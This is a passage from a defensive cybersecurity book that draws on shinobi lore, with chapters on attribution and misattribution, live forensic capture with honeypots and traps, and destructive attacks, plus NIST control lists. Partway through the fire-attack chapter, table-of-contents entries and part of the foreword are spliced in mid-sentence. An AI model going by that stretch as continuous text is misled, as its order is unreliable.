investigations using threat analytics, observable evidence, and behavior-

based intelligence assessments. We’ll also discuss the problem of sophis-

ticated adversaries who are aware of these attribution methods and thus

take countermeasures. The more emphasis a defender places on attribu-

tion, the more difficult and risky cyber threat actors can make pursuing

leads, so we’ll also discuss ways to address this increased risk.

Attribution

Attribution, in a cybersecurity context, refers to an assessment of observ-

able evidence that can be used to identify actors in cyberspace. The evi-

dence can take many forms. A threat actor’s behavior, tools, techniques,

The Art of the Fireflies115

tactics, procedures, capabilities, motives, opportunities, and intent,

among other information, all provide valuable context and drive

responses to security events.

For example, suppose your home alarm went off, indicating a window

had been broken. Your response would vary drastically based on your

level of attribution knowledge: a firefighter entering your home to extin-

guish a blaze would evoke a different response than a robber breaking in

to steal your belongings, or an errant golf ball crashing through the win-

dow. Of course, attribution isn’t always simple to attain. A thief can exer-

cise some control over observable evidence by wearing gloves and a mask.

They could even wear a firefighter outfit to disguise their identity and

deceive homeowners into acquiescing to their entry. A thief could plant,

destroy, or avoid creating evidence of the crime during or after the act,

impeding the subsequent work of forensic investigators. A truly sophisti-

cated criminal might even frame another criminal using spoofed finger-

print pads; stolen hair, blood, or clothing samples; a realistic 3D-printed

mask; or a weapon acquired from the unsuspecting patsy. If the framed

individual has no alibi, or the crime is committed against a target consis-

tent with their motivations, then authorities would have every reason to

suspect or arrest the patsy.

Cybersecurity professionals face these types of attribution prob-

lemsand then some. Attribution is particularly difficult due to the

inherent anonymity of the cyber environment. Even after executing

the difficult task of tracking an attack or event to a source computer

and physical address, cybersecurity professionals can find it exceed-

inglyhard to verify the identity of the human attacker. Attempts

to trace the threat actor’s origin on the compromised machine often

lead to tunnels, VPNs, encryption, and rented infrastructure with no

meaningful logs or evidence. Sophisticated threat actors may even

compromise and remotely connect to foreign machines, using them as

platforms to launch attacks against other systems. Even after detecting

the adversary, it may be advisable in certain cases to not

,

immediately

block them or remove their access; instead, it may be beneficial to

monitor them for a while to determine their goals and identifying

characteristics.6

In some cases, threat groups deliberately leave behind tools or

other observables to push an attribution narrative. The United States,

Russia, and North Korea have reportedly altered or copied code seg-

ments, strings, infrastructure, and artifacts in their cybertools to cause

misattribution.7 When cybersecurity professionals discover and reverse

engineer particularly stealthy malware, they occasionally observe unique,

116Chapter 15

superfluous strings in the malware traces. Perhaps these strings were

overlooked—a tradecraft error by the operator or developer. But they

could also be “the art of fireflies”—evidence designed to be discovered

and used for (mis)attribution.

Note that the same mechanisms that make deception possible also

provide powerful means of identification. Memory dumps, disk images,

registries, caches, network captures, logs, net flows, file analyses, strings,

metadata, and more help identify cyber threat actors. Various intelli-

gence disciplines, such as signal intelligence (SIGINT), cyber intelligence

(CYBINT), and open source intelligence (OSINT), also contribute to

attribution, while human intelligence (HUMINT) capabilities collect

data from specific sources that, once processed and analyzed, helps indi-

cate who may have conducted cyberattacks. These capabilities are typi-

cally kept secret, as disclosing their existence would inform targets how

to avoid, deny, or deceive these systems, stunting the ability to generate

useful intelligence and threat attribution.

Approaches to Handling Attribution

It is reasonable for organizations to want to know the identity and ori-

gin of threat actors who compromise their systems and networks. It’s

understandable that many want to take action, such as hacking back, to

discover who these threat actors are. However, threat actors, like the shi-

nobi, will always find ways to conduct covert malicious actions through

denial and deception, making attribution uncertain. Furthermore, to

take a lesson from history, the need to conduct shinobi attribution only

ceased once Japan was unified under peaceful rule and shinobi were

no more. The world is unlikely to experience unity in the foreseeable

future, so nation-state cyberattacks are likely to continue. Until world

peace happens, the following approaches to attribution can help you

identify what, if anything, you can do about ongoing cyber conflict:

1. Shed your cognitive biases. Reflect on your own cognitive biases and

flawed logic. Everybody has holes in their thinking, but we can be

mindful of them and work to correct them. Construct your own

case studies. Review prior judgments that turned out to be incor-

rect, identify the mistakes made, and consider how to improve

your analytical ability. This important work can be done in small

steps (logic puzzles, crosswords, and brainteasers are a great way

to improve cognitive function) or big strides. You can study arti-

cles and books on psychology that discuss known cognitive biases

The Art of the Fireflies117

and logical fallacies and learn structured analytical techniques to

overcome your own.8

2. Build attribution capabilities. Examine what data sources, systems,

knowledge, and controls you can use to influence attribution at

your organization. Are you running open, unprotected Wi-Fi that

allows unregistered, unauthenticated, and unidentified threat

actors to anonymously connect to your network and launch

attacks? Are you managing routers that allow spoofed IPs, or do

they use reverse-path forwarding (RFP) protection technologies

to prevent anonymized attacks from within your network? Are

you correctly publishing a sender policy framework to prevent

threat actors from spoofing email addresses and assuming your

organization’s identity?

While many of these configuration changes incur no direct

costs, the time and labor (and opportunity costs) to implement

such wide-reaching changes can give management pause. However,

consider whether a prior decision to invest in good cameras and

lighting helps a storekeeper correctly identify a vandal. Establishing

sound logging, documentation, and evidence collection practices

improves attribution capabilities, enforces greater technological

accountability, and provides end users with better visibility into

network threats.

3. . . . Or forget about attribution. Work with your organization’s stake-

holders to determine the scope of attribution efforts necessary

to mitigate risk. For organizations with the ability to arrest threat

actors or launch counteroffensive attacks, attribution is a neces-

sity. However, most organizations cannot or should not attempt to

catch or attack threat actors, learn their identities, or map their

capabilities. In reality, attribution to a specific threat actor is not

always necessary. Awareness of the threat can be enough to ana-

lyze and defend against it.

For example, suppose two threat actors target your organiza-

tion’s intellectual property. One wants to sell the information on

the black market to make money, and the other wants the infor-

mation to help build weapons systems for their country. It actu-

ally doesn’t matter. Regardless of the threat actors’ purpose and

an organization’s capability to track them down, defenders must

ultimately restrict or deny opportunities to exploit their security

flaws. The organization does not necessarily need to assess a

threat actor’s motivation to avoid the threat.

118Chapter 15

C A S T L E T HEORY T HOUGH T E X E RCISE

Consider the scenario in which you are the ruler of a medieval castle with

valuable assets inside . Your guards capture a stranger in the act of dig-

ging a tunnel under one of your castle walls . After intense interrogation, the

stranger claims they were paid to dig a tunnel to the castle’s food storage so

bandits could steal the supplies . However, your guards search the prisoner

and discover a note with instructions on how to communicate with one of

your trusted advisers . The note indicates that this adviser has a plan to spur

rebellion against your rule by depriving your villagers of food . The message

appears authentic . Your guards cannot identify the intruder or whom they are

working for .

Consider how you would conduct attribution to determine who the

intruder is, where they’re from, what their motivation might be, and whom

they might be working for . How could you test the stranger’s assertion that

their ultimate aim is to steal food—as opposed to, say, destroy the food, pro-

vide an infiltration route for a different threat actor, attack castle inhabitants,

or even start a rebellion? How could you confirm your adviser’s role in enemy

schemes? What actions would you take if you did find further evidence for

the intruder’s attribution scenario? And what would you do if you couldn’t

prove it?

Recommended Security Controls and Mitigations

Where relevant, recommendations are presented with applicable security

controls from the NIST 800-53 standard. Each should be evaluated with

the concept of attribution in mind.

1. Map accounts to user identities. Verify the identity of the indi-

vidual associated with the user account via biometrics, identifi-

cation, logical or physical evidence, or access controls. [SA-12:

Supply Chain Protection | (14) Identity and Traceability]

2. Develop a plan that defines how your organization handles attri-

bution assessments of threat agents. [IR-8: Incident Response]

3. Establish threat awareness programs that collect and share infor-

mation on the characteristics of threat actors, how to identify

them in your environment, evidence of attribution, and other

observables. Use specific collection capabilities such as honeypots

The Art of the Fireflies119

for attribution purposes. [PM-16: Threat

,

Awareness Program;

SC-26: HoneyPots]

4. Apply security and collection controls. Perform threat modeling

to identify threat agents. [SA-8: Security and Privacy Engineering

Principles]

Debrief

In this chapter, we reviewed the art of the fireflies—a misattribution tech-

nique used by the shinobi. Cyber threat groups are continually evolving

in sophistication, and they are likely to incorporate this technique into

their operations security procedures, if they haven’t already. We noted

that several threat groups are believed to be using misattribution tech-

niques already and discussed approaches to handling attribution, and

how the future for attribution is bleak.

In the next chapter, we will discuss shinobi tactics for maintaining

plausible deniability when defenders interrogated them. The chapter will

also discuss advanced shinobi interrogation techniques and tools used

when capturing enemy shinobi.

16

L I V E C A P T U R E

Use good judgment to determine whether the target

is actually inattentive or whether they are employing

a ruse to lure ninjas and capture them.

If you find a suspicious individual while you are on night

patrol, you should capture him alive by calling on all your

resources.

—Yoshimori Hyakushu #74

Though shinobi encountered deadly violence as an

everyday part of the job, Bansenshūkai recommends that

enemies, especially suspected ninjas, be captured alive

rather than immediately killed. Searching and interrogat-

ing a captured ninja allows shinobi to discover what the

attacker has done or is planning to do, determine who

theintruder’s employer is, and learn valuable secrets and

tradecraft, all of which could greatly help guards defend

against ninja attacks and help lords to understand strategic threats. In

addition, the captured enemy might turn out to be a comrade in disguise,

a fact that would not be clear until deep interrogation.1 The Ninpiden

122Chapter 16

calls for the suspected ninja to be bound hand and foot and placed on a

leash. The Ninpiden also recommends using tools, such as a spiked gag,

to prevent the captive from talking, as a skillful ninja could alert allies,

persuade their captor to release them, or even bite off their own tongue

to commit suicide.2

The scrolls acknowledge that capturing an enemy ninja alive is no

easy task. One of Bansenshūkai’s more direct techniques involves loading

a musket with a chili powder–infused cotton ball—a sort of ancient tear

gas or pepper spray. When fired at close range, this projectile would create

debilitating irritation in the target’s eyes and nose, rendering them more

susceptible to capture. The scrolls also describe more oblique tactics, such

as fushi-kamari ambushes and traps. For example, the tiger fall trap (mogari

or koraku) described in Bansenshūkai Gunyo-hiki was originally designed

to capture tigers (as the name suggests) but was later modified to capture

ninjas. In it, barriers funnel an intruder through a maze of hidden traps.

While allies would know a trusted path, a ninja infiltrating alone at night

would not, making it likely they would fall into the trap. Other trap meth-

ods used tsuiritei, or “fake suspended wall sections,” which are veneers that

look like real walls but are built with wedges and false posts. When a ninja

would attempt to scale these fake walls, the walls would collapse, surpris-

ing and likely injuring the ninja and thus permitting their easy capture.3

Bansenshūkai also suggests defensive measures to guard against cap-

ture, suggesting ways to detect and avoid fushi-kamari ambushes. Shinobi

were advised to scout forests, fields, valleys, trenches, and other settings

for unnatural behavior from birds, other animals, and even the grass, all

of which could indicate a trap. Dummies and unusual smells also tip the

hand of a potential ambush.4 In enemy territory, shinobi could deploy a

number of evasive tactics, including:

Quail hiding (uzura-gakure) A shinobi would curl into a ball on the

ground and concentrate on being blind, unaware, and unresponsive

so the enemy would be unlikely to find them. Even when prodded by

a guard with a spear or sword, they would not react.

Raccoon dog retreat (tanuki-noki) While fleeing on foot, a shinobi

would decide to be “caught” by a faster pursuer. When the gap between

them narrowed, the shinobi would drop to the ground without warn-

ing and aim their sword at the pursuer’s waist, impaling the pursuer

before they could react.

Retreat by 100 firecrackers (hyakurai-ju) A shinobi would place

firecrackers near the target, either setting them on a delayed fuse

or arranging for allies to light them. The sound would distract the

enemy pursuers.

Live Capture123

Fox hiding (kitsune-gakure) A shinobi would escape by moving

vertically. Instead of trying to flee enemy territory by moving from

point A to point B, the shinobi would climb a tall tree or hide in

a moat, changing the dimensions of the chase. This tactic often

stumped the enemy, who was unlikely to think to look up or down

for the target.5

Other methods of escape included imitation—mimicking a dog or

other animal to deceive pursuers—and false conversation—language

that would mislead the enemy, allowing the shinobi to flee.6 For exam-

ple, a shinobi who knew they were being followed might pretend not to

hear the pursuers and whisper to an imaginary ally so the alert guards

would overhear them. If the shinobi said, “Let’s quietly move to the

lord’s bedroom so we may kill him in his sleep,” the guards would likely

send forces to the lord’s bedroom, allowing the shinobi to escape in

another direction.

Of course, the best way for shinobi to avoid being captured was to

leave behind no evidence that could lead investigators to suspect a breach

in the first place. The scrolls stress the importance of conducting mis-

sions without trace so that the target has no cause to suspect a shinobi on

the premises. Guidance on operating covertly abounds in the scrolls; the

writing is artfully vivid in places. Yoshimori Hyakushu #53 states, “If you

have to steal in as a shinobi when it is snowing, the first thing you must be

careful about is your footsteps.”7

Capturing threats alive is, unfortunately, not always top of mind for

many organizations. When some organizations detect a threat on a sys-

tem, they do the opposite of what is recommended in the shinobi scrolls:

they immediately unplug the machine, wipe all data, reformat the drive,

and install a fresh version of the operating system. While this wipe-and-

forget response eradicates the threat, it also eliminates any opportunity

to capture the threat, let alone investigate it or analyze its goals, what it

has already accomplished, and how.

In this chapter, we will discuss the importance of being able to cap-

ture and interact with cyber threats while they are “alive.” We will review

existing forensics/capture methods, along with ways threat actors may

attempt to evade them. We’ll consider ways to capture cyber threats

“alive” with tiger traps and honey ambushes—techniques inspired by

the ancient shinobi. In addition, we will touch on modern implementa-

tions of shinobi evasion tactics (e.g., quail hiding and fox hiding) that

have been used by persistent threats. Lastly, we’ll cover much of the

capture and interrogation guidance from the shinobi scrolls—guidance

around how to properly control a threat so it cannot alert its allies or

self-destruct.

124Chapter 16

Live Analysis

In cybersecurity, computer forensic imaging provides necessary threat

intelligence. Forensic images are typically made after a security incident

(such as a malware infection) or a use violation (such as the download

of child p*rnography onto a device), with imaging done in a way that

preserves evidence without disrupting the integrity of the data on the

system under investigation. Evidence from a forensic image can help

security professionals learn what the

,

threat was and how it exploited

vulnerabilities. Then, in time, it can provide the information necessary

to develop signatures, safeguards, and proactive blocking measures.

For instance, determining that an attacker was after specific intellectual

property on one critical system tells defenders to protect that system’s

data. If forensics determines that the attack succeeded and sensitive data

was compromised, the organization can use that knowledge to deter-

mine its strategic business response. If the threat failed, the organization

can prepare for possible follow-up attacks. Forensic indicators might also

provide an understanding of who was responsible for the threat, fur-

ther dictating the response. An organization’s strategy should take into

account the severity of the threat—for instance, whether the attacker

was a foreign government, a disgruntled employee, or a kid performing

harmless notoriety hacking.

Collecting a device’s data for analysis involves live capture (also known

as live analysis or live acquisition) and imaging (also forensic imaging or mir-

roring). Organizations use honeypots and other deceptive virtual environ-

ments to live capture and even interact with attackers. Such systems are

often configured to lure in hackers or be easily accessible to malware so

that when the threat infiltrates the system, hidden logging and monitor-

ing controls capture exactly what the threat does and how, along with

other observables. Unfortunately, many attackers are aware of these

honeypots and perform tests to determine whether they are inside a

simulated environment meant to collect intelligence. If their suspicions

are confirmed, attackers will behave differently or cease operations,

undermining the security team’s efforts. Network access control (NAC)

devices can also contain live threats by dynamically switching a system

to an infected VLAN, where it remains online and “live” while defenders

respond.

Forensics are not typically performed on a live capture. Rather, the

forensic analyst looks at static, inert, or dead data, which may have lost

certain information or the threat’s unique details. This is commonly seen

in fileless malware, which resides in memory, or in specific malicious

Live Capture125

configurations or artifacts, such as those in routing table caches. Live

analysis is not conducted more often for a number of reasons, including:

• Specialized technology requirements

• Having to bypass organizational policies that require disconnect-

ing, unplugging, quarantining, or blocking compromised systems

• A lack of capable forensic resources that are physically onsite to

conduct live analysis

• Lack of employee access to vital systems during an investigation

Perhaps most importantly, if live analysis is mishandled, the threat

can become aware of the forensic imaging software on the system and

decide to hide, delete itself, perform antiforensic countermeasures, or

execute destructive attacks against the system.

To bypass forensic capture techniques, threats deploy in multiple stages.

During the initial stage, reconnaissance, the threat looks for the presence of

capturing technology, only loading malware and tools after it validates that

it can operate safely within the environment. Such precautions are neces-

sary for the threat actor. If a successful capture and forensic analysis occurs,

the threat’s tools and techniques can be shared with other organizations

and defenders, allowing them to learn from the attack, patch against it, or

develop countermeasures. Law enforcement may even use forensic capture

tactics to track down or provide evidence against threat actors.

Recently, sophisticated actors have moved laterally into computer and

network areas that standard forensic imaging, capture, and analysis tools

do not or cannot inspect. These actors’ innovations include installing hard

drive firmware that creates a hidden, encoded filesystem; embedding mal-

ware in BIOS storage; leveraging local microchip storage to operate out-

side normal working memory; and changing low-level modules and code

on networking gear such as routers, switches, smart printers, and other

devices not traditionally inspected by or even practical for forensic imag-

ing. Certain threats imitate core OS or trusted security components by

infiltrating the original manufacturer, who is inherently trusted and not

considered for forensic analysis. Others hide by deleting forensic evidence,

moving to the memory of a system that does not reset often—such as a

domain controller—and then waiting for forensic scrutiny on the systems

of interest to subside before returning to the intended target.

Confronting Live Threats

Organizations too often find themselves dealing with an active security

incident when the single person trained to use forensic imaging tools is

126Chapter 16

out of the office. It sometimes takes days before the quarantined machine

can be shipped to that person for examination, and by then, the attack is

no longer a live representation of the current threat. This inability to oper-

ate at the same speed as the threat, or faster, leaves defenders relegated to

the role of a forensic janitor—the person who collects evidence and cleans

up infections after the threat actor has already achieved their objectives.

Proactively establishing capabilities, traps, and ambushes to confront the

threat is necessary to capture it alive and interrogate it thoroughly.

1. Establish a forensic capability. Commit to and invest in establishing

a dedicated team with the equipment, experience, certification,

and authorization to perform computer forensics. Create forensic

kits with write blockers, secure hard drives, and other specialized

software and devices. Ensure that all systems used for capture and

analysis have appropriate forensic agents so the team can imme-

diately identify, locate, isolate, and perform collection. Ensure

that all employees understand how they can help the forensic

team identify and locate affected systems and preserve evidence.

If it has been more than a month since they conducted a forensic

investigation, run refresher training courses or exercises with the

forensic team. Most importantly, when a forensic report is done,

read it to discover root causes of security incidents and take proac-

tive measures to remediate the vulnerabilities exploited.

2. Conduct honey ambushes. Where appropriate, empower your team

to ambush threat actors rather than simply following their trail or

catching them in a honeypot. Aggressively trapping and ambush-

ing threats requires close partnerships with cloud hosts, ISPs,

registrars, VPN service providers, the Internet Crime Complaint

Center (IC3), financial services, law enforcement organizations,

private security companies, and commercial companies. Support

the goal of creating network territory hostile to threat actors,

where the combined forces of you and your partners can ambush

threat actors, groups, or campaigns to capture evidence, mal-

ware, tools, and exploits themselves.

3. Set tiger traps. Consider creating tiger fall traps in likely targets in

your network, such as a domain controller. A market opportunity

exists for a product that serves as an operational production sys-

tem with honeypot capabilities that trigger if the wrong action is

performed. Because threat actors attempting to bypass security

controls typically pivot from one system to another or move later-

ally across systems and networks, it may be possible to establish

false or booby-trapped jumpboxes that seem like routes to other

Live Capture127

networks but in fact trap the threat. Deploy these traps in such a

way that the wrong action causes a system to freeze, lock, or iso-

late the attack, in turn allowing defenders to examine, interact

with, or forensically live capture the threat. Do this by freezing the

CPU clock, causing the hard drive to operate in buffer mode only,

,

or using a hypervisor to trap and log the activity. Provide train-

ing to ensure that system admins and other IT professionals can

remotely traverse a legitimate path without falling into the trap.

C A S T L E T HEORY T HOUGH T E X E RCISE

Consider the scenario in which you are the ruler of a medieval castle with

valuable assets inside . Your guards recently captured an intruder they

believed to be a ninja, quickly killed the suspect, and then set the body on

fire . The guards say they took these measures to remove any residual risk the

ninja posed . When you ask your guards why they thought the intruder was a

ninja, what the intruder carried on their person, what this person was doing

in the castle, and how a stranger successfully infiltrated your stronghold, the

guards do not know . They seem to expect praise for quickly terminating the

threat while suffering minimal harm themselves .

How could you establish better protocols, procedures, and tools for your

guards to safely apprehend suspected intruders? How would you have inter-

rogated the ninja—if the intruder was indeed a ninja—had your guards not

killed them? What would you have looked for in the ninja’s possessions had

they not been burned? How do you think the ninja infiltrated your castle, and

how could you confirm those suspicions? How would you search your castle

to determine whether the ninja performed sabotage, placed traps, or sent

a signal before they died? What would you ask the guard who discovered

the ninja, and how could their answers help you train other guards? What

do you expect to learn from this investigation, and what decisions or actions

might you take based on your findings?

Recommended Security Controls and Mitigations

Where relevant, recommendations are presented with applicable security

controls from the NIST 800-53 standard. Each should be evaluated with

the concept of live capture in mind.

1. Restrict the use of external systems and components within your

organization if you do not have the authorization or capability

128Chapter 16

to perform forensic investigations on them. [AC-20: Use of

External System | (3) Non-Organizationally Owned Systems and

Components]

2. Using external sensors and SIEMs that cannot be easily accessed,

implement automated mechanisms to fully collect live data, PCAPs,

syslog, and other data needed for forensic analysis. [AU-2: Audit

Events; AU-5: Response to Audit Processing Failures | (2) Real-Time

Alerts; IR-4: Incident Handling | (1) Automated Incident Handling

Processes; SA-9: External System Services | (5) Processing, Storage,

and Service Location; SC-7: Boundary Protection | (13) Isolation of

Security Tools, Mechanisms, and Support Components]

3. If you decide to implement non-persistence as a countermeasure

against threats—such as by regularly reimaging or rebuilding

all your systems to destroy any unauthorized access—consider

performing a forensic capture before reimaging or teardown to

preserve evidence of threats. [AU-11: Audit Record Retention |

(1) Long-Term Retrieval Capability; MP-6: Media Sanitization

| (8) Remote Purging or Wiping of Information; SI-14: Non-

Persistence; SI-18: Information Disposal]

4. Implement, document, and enforce baseline system configura-

tions in your organization so forensic analysts can more eas-

ily determine what information could have been altered by a

threat. [CM-2: Baseline Configuration | (7) Configure Systems

and Components for High-Risk Areas; SC-34: Non-Modifiable

Executable Programs]

5. Provide training and simulated exercises for your forensic staff

to facilitate effective responses in the event of a security incident.

[IR-2: Incident Response Training | (1) Simulated Events]

6. Establish a forensic analysis team with the capability and authori-

zation to conduct real-time forensic collection and investigation.

[IR-10: Integrated Information Security Analysis Team]

7. Use safeguards to validate that forensic systems, software, and

hardware have not been tampered with. [SA-12: Supply Chain

Risk Management | (10) Validate as Genuine and Not Altered |

(14) Identity and Traceability]

Live Capture129

Debrief

In this chapter, we reviewed the shinobi techniques of capturing and

interrogating enemy shinobi, as well as tactics used to evade capture. We

touched on how collecting more forensic evidence gives the threat actor

more opportunities to feed investigators false data points—and why it can

be better to interact with live threats. We discussed best practices around

forensic capabilities to gain visibility into threats, along with advanced

techniques, such as ambushes and traps, for confronting threats.

In the next chapter, we will discuss the most destructive mode of

attack in the shinobi’s arsenal: attacking with fire.

17

F I R E A T T A C K

First, it is easy to set fires; second, it is not easy for the

enemy to put out the fire; and third, if your allies are coming

to attack the castle at the same time, the enemy will lose any

advantage as the fortifications will be understaffed.

If you are going to set fire to the enemy’s castle or camp, you need

to prearrange the ignition time with your allies.

—Yoshimori Hyakushu #83

One of the most impactful things a shinobi could do after

infiltrating a castle or fortification was start a fire—ideally

in or around gunpowder storehouses, wood stores, food

or supply depots, or bridges. A well-set fire spread quickly

while staying out of sight; could not be contained or extin-

guished easily; and became an immediate danger to the

castle’s integrity, supplies, and inhabitants. Castle defend-

ers were forced to choose between putting out the flames

and fighting the enemy army signaled to attack by the

132Chapter 17

arsonist. Attempting to fight both battles at once weakened a target’s abil-

ity to do either. Those who fought the fire were easily overtaken by the

advancing soldiers, while those who ignored the fire to take up arms ulti-

mately lost the battle no matter how well they fought.1

The scrolls talk at length about fire attacks, including the various

tools, tactics, and skills used to execute them. Before an attack, shinobi

studied a castle’s inhabitants to determine when they slept or when key

positions went unguarded. They then worked with other invaders to

coordinate timing. Shinobi engineered numerous custom tools for these

attacks, such as fire arrows, covert fire-holding cylinders, land mines,

bombs, and throwable torches.2 Among the most visually dynamic weap-

ons were “heat horses”—horses with special torches tied to their saddles

and set loose to run wildly inside fortifications, spreading fire chaotically,

distracting guards and inhabitants, and proving difficult to contain.

Amid the confusion, shinobi communicated with forces concealed out-

side the castle to cue the attack once the fire had sufficiently spread.3

While medieval armies had the capability to initiate a fire attack

from afar—by deploying archers to shoot fire arrows, for example—

Bansenshūkai recommends that commanders employ shinobi to set the

fire instead. Compared to external attacks, fires set by shinobi would not

be spotted and extinguished as quickly. Also, the shinobi could set them

near combustible or strategically valuable items, and an agent could feed

them until they grew.4

The success of fire attacks made them ubiquitous in feudal Japan,

so many castles began implementing targeted countermeasures. These

included fireproofing fortifications with dozo-zukuri (“fireproofing with

plaster”) or fire-resistant lacquer,5 building with fireproof or fire-resistant

materials such as clay or rock, using fire-resistant roof tiles, establishing

fire watch teams, and creating firebreaks by designating inconsequential

buildings (i.e., buildings that could be sacrificed to prevent fire from

spreading to critical infrastructure).6 Guards were also warned that

fires might be purposeful distractions

,

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 149

Recommended Security Controls and Mitigations . . . . . . . . . . . . . . . . . . . . . 150

Debrief . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 151

xivContents in Detail

20

LIGHT, NOISE, AND LITTERDISCIPLINE 153

The traditions of the ancient shinobi say you should lock the doors before you

have a look at the enemy with fire.

Cyber Light, Noise, and Litter . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 155

Detection Discipline . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 156

Recommended Security Controls and Mitigations . . . . . . . . . . . . . . . . . . . . . 158

Debrief . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 158

21

CIRc*msTANCES OF INFILTRATION 159

You should infiltrate at the exact moment that the enemy moves and not try

when they do not move—this is a way of principled people.

Adversarial Opportunity . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 161

Adversarial Adversity . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 162

Recommended Security Controls and Mitigations . . . . . . . . . . . . . . . . . . . . . 163

Debrief . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 163

22

ZERO-DAYS 165

A secret will work if it is kept; you will lose if words are given away.

Zero-Day . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 168

Zero-Day Defense . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 169

Recommended Security Controls and Mitigations . . . . . . . . . . . . . . . . . . . . . 172

Debrief . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 174

23

HIRING SHINOBI 175

In order to defend against enemy plans or shinobi, or should an emergency arise,

you may think it more desirable to have a large number of people. However, you

should not hire more people into your army without careful consideration.

Cybersecurity Talent . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 177

Talent Management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179

Recommended Security Controls and Mitigations . . . . . . . . . . . . . . . . . . . . . 181

Debrief . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 182

24

GUARDHOUSE BEHAVIOR 185

Do not let your guard down, even if you are not confronting the enemy.

Security Operations Center Issues and Expectations . . . . . . . . . . . . . . . . . . . 187

Influencing Behavior . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 188

Recommended Security Controls and Mitigations . . . . . . . . . . . . . . . . . . . . . 191

Debrief . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 192

Contents in Detailxv

25

ZERO-TRUST THREAT MANAGEMENT 195

If you enter a room from the rear and if there is someone in the room who is

not asleep, then they will not suspect you as an intruder. It is because those

who come from the rear are not considered possible thieves or assailants.

Threat Opportunity . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 196

Blocking the Suspicious . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 198

Recommended Security Controls and Mitigations . . . . . . . . . . . . . . . . . . . . . 200

Debrief . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 200

26

SHINOBI TRADECRAFT 201

Secret techniques to infiltrate without fail are deceptive, and they are varied

and flexible and are done according to opportunity. Thus, as a basis, you

should embrace the old ways of the shinobi who served under ancient great

generals, but remember not only to keep to these ways but to adapt them, each

dependent on the situation and the moment.

Techniques, Tactics, and Procedures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 204

Pyramid of Pain . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 205

ATT&CK Framework . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 206

Threat Intelligence . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 206

Cyber Threat Intelligence . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 208

Recommended Security Controls and Mitigations . . . . . . . . . . . . . . . . . . . . . 210

Debrief . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 211

NOTES 213

INDEX 223

F O R E W O R D

Cybersecurity has never been this critical to our economic prosperity and

social peace. The need to protect our businesses’ intellectual property and

people’s personal information is of utmost importance. Cybercriminals

are getting faster, more creative, more organized, and more resourceful.

Cybersecurity practitioners find themselves constantly discovering new

threats and responding to new attacks, despite all the cyberdefense mea-

sures they have already taken. It’s a cyber arms race.

In the 200 or so pages that follow, Benjamin McCarty, a brilliant cyber

threat intelligence expert and an innovative security researcher whom I

have known since 2017, shares how to protect your information from cyber-

hackers. Ben’s main message is simple: think like a ninja. But what about

this message justifies writing an entire book? For the full and thorough

answer, you just have to read it. But I can tell you that, at a high level, the

answer lies in the tactics and techniques that ninjas use to wage warfare.

When I was in graduate school 15 years ago, the first security lesson I

learned in my security engineering class was to think like a hacker. Within

the cybersecurity community, we have been touting this message for several

years, if not decades. But judging by the number of cyberattacks that orga-

nizations continue to undergo every year, this message does not seem to

have sunk in for a large number of cyberdefenders. This is understandable

for two reasons. First, the message is hard to internalize because of the lack

of details. And second, any details available may be very hard to grasp. Ben

addresses both issues by changing the message from “Think like a hacker”

to “Think like a ninja.”

“How?” you might ask. Well, the answer lies in the ninja scrolls, which

,

to facilitate theft, attack, or other

actions7 (advice later mirrored in the Gunpo Jiyoshu manual8).

It is important to remember that shinobi did not have automatic light-

ers and that defenders kept a constant lookout for arsonists (much like

modern organizations that maintain antivirus and threat detection every-

where). Shinobi engineered ingenious methods to deliver fire covertly,

weaponize it, and exploit combustible targets. When imagining how

cyberattacks could be delivered and weaponized against targets, keep shi-

nobi ingenuity with fire attacks in mind.

In this chapter, we will review how, in the context of cyberwar, shi-

nobi fire attacks are surprisingly similar to modern hybrid tactics. Fire is

Fire Attack133

a great analogy for wormable/self-propagating cyberattacks, as it spreads

to everything it can touch. We will review examples of destructive cyberat-

tacks, as well as how modern adversaries time and coordinate them. We

will touch on the various defenses that organizations use to prevent, miti-

gate, contain, and recover from cyberattacks. Takeaways from this chap-

ter can be applied to firewalls, as well as new, more advanced network

defense strategies.

Destructive Cyber Attacks

Not long after computers were able to connect and communicate with

each other, self-propagating viruses and worms were born. Destructive

attacks have only gotten more prolific with time. Now, a destructive attack

on one organization’s network can quickly spread like fire, destroying

systems and data across the internet. Considering the growing intercon-

nectedness of systems in cyberspace as well as inherent security flaws, a

network or machine connected to the internet without patches or other

safeguards is basically kindling just waiting to be lit.

In the early 2000s, the industry saw its first ransomware attacks. In

these attacks, malware encrypts a system or network’s data (and deletes

the backups) until the target pays to unencrypt them. These viruses

quickly spread from systems to network storage to the cloud, holding

data hostage or, in the case of nonpayment, destroying it through encryp-

